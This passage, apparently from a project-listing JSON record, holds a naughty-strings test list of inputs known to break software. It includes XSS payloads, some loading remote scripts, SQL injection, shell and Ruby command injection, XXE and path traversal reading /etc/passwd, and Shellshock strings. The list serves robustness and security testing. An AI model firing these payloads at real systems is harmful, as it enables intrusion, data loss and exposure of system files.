\\x0Conerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x00onerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x27onerror=javascript:alert(1)\u003e\n`\"'\u003e\u003cimg src=xxx:x \\x20onerror=javascript:alert(1)\u003e\n\"`'\u003e\u003cscript\u003e\\x3Bjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x0Djavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xEF\\xBB\\xBFjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x81javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x84javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE3\\x80\\x80javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x09javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x89javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x85javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x88javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x00javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\xA8javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x8Ajavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE1\\x9A\\x80javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x0Cjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x2Bjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xF0\\x90\\x96\\x9Ajavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e-javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x0Ajavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\xAFjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x7Ejavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x87javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x81\\x9Fjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\xA9javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xC2\\x85javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xEF\\xBF\\xAEjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x83javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x8Bjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xEF\\xBF\\xBEjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x80javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x21javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x82javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE2\\x80\\x86javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xE1\\xA0\\x8Ejavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x0Bjavascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\x20javascript:alert(1)\u003c/script\u003e\n\"`'\u003e\u003cscript\u003e\\xC2\\xA0javascript:alert(1)\u003c/script\u003e\n\u003cimg \\x00src=x onerror=\"alert(1)\"\u003e\n\u003cimg \\x47src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x11src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x12src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x47src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x10src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x13src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x32src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x47src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg\\x11src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x47src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x34src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x39src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg \\x00src=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x09=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x10=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x13=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x32=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x12=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x11=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x00=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src\\x47=x onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x09onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x10onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x11onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x12onerror=\"javascript:alert(1)\"\u003e\n\u003cimg src=x\\x13onerror=\"javascript:alert(1)\"\u003e\n\u003cimg[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\"\u003e\n\u003cimg src=x onerror=\\x09\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x10\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x11\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x12\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x32\"javascript:alert(1)\"\u003e\n\u003cimg src=x onerror=\\x00\"javascript:alert(1)\"\u003e\n\u003ca href=java\u0026#1\u0026#2\u0026#3\u0026#4\u0026#5\u0026#6\u0026#7\u0026#8\u0026#11\u0026#12script:javascript:alert(1)\u003eXXX\u003c/a\u003e\n\u003cimg src=\"x` `\u003cscript\u003ejavascript:alert(1)\u003c/script\u003e\"` `\u003e\n\u003cimg src onerror /\" '\"= alt=javascript:alert(1)//\"\u003e\n\u003ctitle onpropertychange=javascript:alert(1)\u003e\u003c/title\u003e\u003ctitle title=\u003e\n\u003ca href=http://foo.bar/#x=`y\u003e\u003c/a\u003e\u003cimg alt=\"`\u003e\u003cimg src=x:x onerror=javascript:alert(1)\u003e\u003c/a\u003e\"\u003e\n\u003c!--[if]\u003e\u003cscript\u003ejavascript:alert(1)\u003c/script --\u003e\n\u003c!--[if\u003cimg src=x onerror=javascript:alert(1)//]\u003e --\u003e\n\u003cscript src=\"/\\%(jscript)s\"\u003e\u003c/script\u003e\n\u003cscript src=\"\\\\%(jscript)s\"\u003e\u003c/script\u003e\n\u003cIMG \"\"\"\u003e\u003cSCRIPT\u003ealert(\"XSS\")\u003c/SCRIPT\u003e\"\u003e\n\u003cIMG SRC=javascript:alert(String.fromCharCode(88,83,83))\u003e\n\u003cIMG SRC=# onmouseover=\"alert('xxs')\"\u003e\n\u003cIMG SRC= onmouseover=\"alert('xxs')\"\u003e\n\u003cIMG onmouseover=\"alert('xxs')\"\u003e\n\u003cIMG SRC=\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\n\u003cIMG SRC=\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMG SRC=\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\n\u003cIMG SRC=\"jav ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x09;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0A;ascript:alert('XSS');\"\u003e\n\u003cIMG SRC=\"jav\u0026#x0D;ascript:alert('XSS');\"\u003e\nperl -e 'print \"\u003cIMG SRC=java\\0script:alert(\\\"XSS\\\")\u003e\";' \u003e out\n\u003cIMG SRC=\" \u0026#14; javascript:alert('XSS');\"\u003e\n\u003cSCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003cBODY onload!#$%\u0026()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")\u003e\n\u003cSCRIPT/SRC=\"http://ha.ckers.org/xss.js\"\u003e\u003c/SCRIPT\u003e\n\u003c\u003cSCRIPT\u003ealert(\"XSS\");//\u003c\u003c/SCRIPT\u003e\n\u003cSCRIPT SRC=http://ha.ckers.org/xss.js?\u003c B \u003e\n\u003cSCRIPT SRC=//ha.ckers.org/.j\u003e\n\u003cIMG SRC=\"javascript:alert('XSS')\"\n\u003ciframe src=http://ha.ckers.org/scriptlet.html \u003c\n\\\";alert('XSS');//\n\u003cu oncopy=alert()\u003e Copy me\u003c/u\u003e\n\u003ci onwheel=alert(1)\u003e Scroll over me \u003c/i\u003e\n\u003cplaintext\u003e\nhttp://a/%%30%30\n\u003c/textarea\u003e\u003cscript\u003ealert(123)\u003c/script\u003e\n\n#\tSQL Injection\n#\n#\tStrings which can cause a SQL injection if inputs are not sanitized\n\n1;DROP TABLE users\n1'; DROP TABLE users-- 1\n' OR 1=1 -- 1\n' OR '1'='1\n\n%\n_\n\n#\tServer Code Injection\n#\n#\tStrings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)\n\n-\n--\n--version\n--help\n$USER\n/dev/null; touch /tmp/blns.fail ; echo\n`touch /tmp/blns.fail`\n$(touch /tmp/blns.fail)\n@{[system \"touch /tmp/blns.fail\"]}\n\n#\tCommand Injection (Ruby)\n#\n#\tStrings which can call system commands within Ruby/Rails applications\n\neval(\"puts 'hello world'\")\nSystem(\"ls -al /\")\n`ls -al /`\nKernel.exec(\"ls -al /\")\nKernel.exit(1)\n%x('ls -al /')\n\n# XXE Injection (XML)\n#\n#\tString which can reveal system files when parsed by a badly configured XML parser\n\n\u003c?xml version=\"1.0\" encoding=\"ISO-8859-1\"?\u003e\u003c!DOCTYPE foo [ \u003c!ELEMENT foo ANY \u003e\u003c!ENTITY xxe SYSTEM \"file:///etc/passwd\" \u003e]\u003e\u003cfoo\u003e\u0026xxe;\u003c/foo\u003e\n\n#\tUnwanted Interpolation\n#\n#\tStrings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.\n\n$HOME\n$ENV{'HOME'}\n%d\n%s%s%s%s%s\n{0}\n%*.*s\n%@\n%n\nFile:///\n\n#\tFile Inclusion\n#\n#\tStrings which can cause user to pull in files that should not be a part of a web server\n\n../../../../../../../../../../../etc/passwd%00\n../../../../../../../../../../../etc/hosts\n\n#\tKnown CVEs and Vulnerabilities\n#\n#\tStrings that test for known vulnerabilities\n\n() { 0; }; touch /tmp/blns.shellshock1.fail;\n() { _; } \u003e_[$($())] { touch /tmp/blns.shellshock2.fail; }\n\u003c\u003c\u003c %s(un='%s') = %u\n+++ATH0\n\n#\tMSDOS/Windows Special Filenames\n#\n#\tStrings which are reserved characters in MSDOS/Windows\n\nCON\nPRN\nAUX\nCLOCK$\nNUL\nA:\nZZ:\nCOM1\nLPT1\nLPT2\nLPT3\nCOM2\nCOM3\nCOM4\n\n# IRC specific strings\n#\n# Strings that may occur on IRC clients that make security products freak out\n\nDCC SEND STARTKEYLOGGER 0 0 0\n\n#\tScunthorpe Problem\n#\n#\tInnocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)\n\nScunthorpe General Hospital\nPenistone Community Church\nLightwater Country Park\nJimmy Clitheroe\nHorniman Museum\nshitake mushrooms\nRomansInSussex.co.uk\nhttp://www.cum.qc.ca/\nCraig Cockburn, Software Specialist\nLinda Callahan\nDr. Herman I. Libshitz\nmagna cum laude\nSuper Bowl XXX\nmedieval erection of parapets\nevaluate\nmocha\nexpression\nArsenal canal\nclassic\nTyson Gay\nDick Van Dyke\nbasement\n\n#\tHuman injection\n#\n#\tStrings which may cause human to reinterpret worldview\n\nIf you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.\n\n#\tTerminal escape codes\n#\n#\tStrings which punish the fools who use cat/type on this file\n\nRoses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue\nBut now...\u001b[20Cfor my greatest trick...\u001b[8m\nThe quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]\n\n#\tiOS Vulnerabilities\n#\n#\tStrings which crashed iMessage in various versions of iOS\n\nPowerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗\n🏳0🌈️\nజ్ఞ‌ా\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finitstring%2Ftest","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Finitstring%2Ftest","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Finitstring%2Ftest/lists"}